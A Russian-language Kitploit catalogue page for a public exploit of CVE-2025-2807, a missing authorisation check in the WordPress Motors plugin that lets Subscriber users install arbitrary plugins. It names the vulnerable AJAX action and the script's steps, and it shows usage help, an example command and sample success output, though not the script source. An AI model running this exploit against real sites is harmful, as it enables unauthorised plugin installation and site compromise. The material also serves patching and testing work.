Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - Уязвимость произвольной установки плагинов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-2807
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - Уязвимость произвольной установки плагинов

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-2807: Motors Plugin <= 1.4.64 - Уязвимость произвольной установки плагинов

Эксплойт от: Nxploited | Khaled Alenazi


⚠️ Сводка об уязвимости

Плагин: Motors (<= 1.4.64)
Тип: Отсутствие авторизации для аутентифицированных пользователей (Subscriber+), позволяющее произвольную установку плагинов
Серьёзность: 8.8 (CVSS v3)
Обнаружено: 07 апреля 2025
VDP: Нет


🔥 Влияние эксплойта

Эта уязвимость позволяет любому аутентифицированному пользователю WordPress (Subscriber+) устанавливать произвольные плагины без надлежащей проверки авторизации.

Из-за отсутствия проверки прав в функции mvl_setup_wizard_install_plugin пользователь с низкими привилегиями может выполнять действия, предназначенные для администраторов.

📅 Ожидается массовая эксплуатация из-за простоты и критического воздействия.


🚫 Технические детали

  • Уязвимая конечная точка: /wp-admin/admin-ajax.php
  • Уязвимое действие: mvl_setup_wizard_install_plugin
  • Требуемый уровень доступа: Subscriber+ (авторизованный пользователь)
  • Основная проблема: отсутствует current_user_can('install_plugins') или аналогичная проверка прав

🚀 Эксплойт-скрипт (Python)

Этот скрипт:

  1. Выполняет вход как подписчик (subscriber)
  2. Извлекает необходимый nonce (из HTML или JS)
  3. Инициирует уязвимый AJAX-запрос для установки выбранного плагина

📃 Использование

usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Пример выполнения

python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Вывод:

[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}


✨ Эксплойт от Nxploited (Khaled Alenazi)

Скачать инструмент